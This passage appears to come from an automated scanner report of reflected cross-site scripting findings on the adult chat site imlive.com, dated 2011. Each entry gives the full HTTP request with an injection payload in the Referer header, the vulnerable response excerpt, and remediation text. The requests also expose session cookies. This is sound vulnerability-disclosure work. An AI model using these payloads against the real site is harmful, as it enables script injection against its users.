http://www.google.com/search?hl=en&q=2ca5e'-alert(1)-'e9dfbf1b8ea
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:34 GMT Connection: close Content-Length: 195039 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ript type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/&rf=http://www.google.com/search?hl=en^q=2ca5e'-alert(1)-'e9dfbf1b8ea&qs=cat=1^roomid=53&qs=cat=1^roomid=53&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ad47'-alert(1)-'76a1a657857 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/guy-alone/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=5ad47'-alert(1)-'76a1a657857
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:48 GMT Connection: close Content-Length: 69840 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/&rf=http://www.google.com/search?hl=en^q=5ad47'-alert(1)-'76a1a657857&qs=cat=1^roomid=54&qs=cat=1^roomid=54&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1502'-alert(1)-'6f19a081c72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/happyhour/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=d1502'-alert(1)-'6f19a081c72
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:43 GMT Connection: close Content-Length: 22380 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/&rf=http://www.google.com/search?hl=en^q=d1502'-alert(1)-'6f19a081c72&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b461'-alert(1)-'6f4815116d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=8b461'-alert(1)-'6f4815116d3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:22 GMT Connection: close Content-Length: 118812 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/&rf=http://www.google.com/search?hl=en^q=8b461'-alert(1)-'6f4815116d3&qs=cat=1^roomid=191&qs=cat=1^roomid=191&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7026c'-alert(1)-'0aae3d52806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=7026c'-alert(1)-'0aae3d52806
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:47 GMT Connection: close Content-Length: 32900 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/&rf=http://www.google.com/search?hl=en^q=7026c'-alert(1)-'0aae3d52806&qs=cat=1^roomid=11&qs=cat=1^roomid=11&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff204'-alert(1)-'8fd9da9f013 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/live-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ff204'-alert(1)-'8fd9da9f013
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:25 GMT Connection: close Content-Length: 25009 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/&rf=http://www.google.com/search?hl=en^q=ff204'-alert(1)-'8fd9da9f013&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bd48'-alert(1)-'6c03af217a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/nude-chat/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=3bd48'-alert(1)-'6c03af217a6
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:40 GMT Connection: close Content-Length: 23212 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... avascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/&rf=http://www.google.com/search?hl=en^q=3bd48'-alert(1)-'6c03af217a6&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f14'-alert(1)-'1a0426053d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/orgies/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=e2f14'-alert(1)-'1a0426053d6
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:37 GMT Connection: close Content-Length: 49057 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/&rf=http://www.google.com/search?hl=en^q=e2f14'-alert(1)-'1a0426053d6&qs=cat=1^roomid=14&qs=cat=1^roomid=14&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ae9'-alert(1)-'abc512c790d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
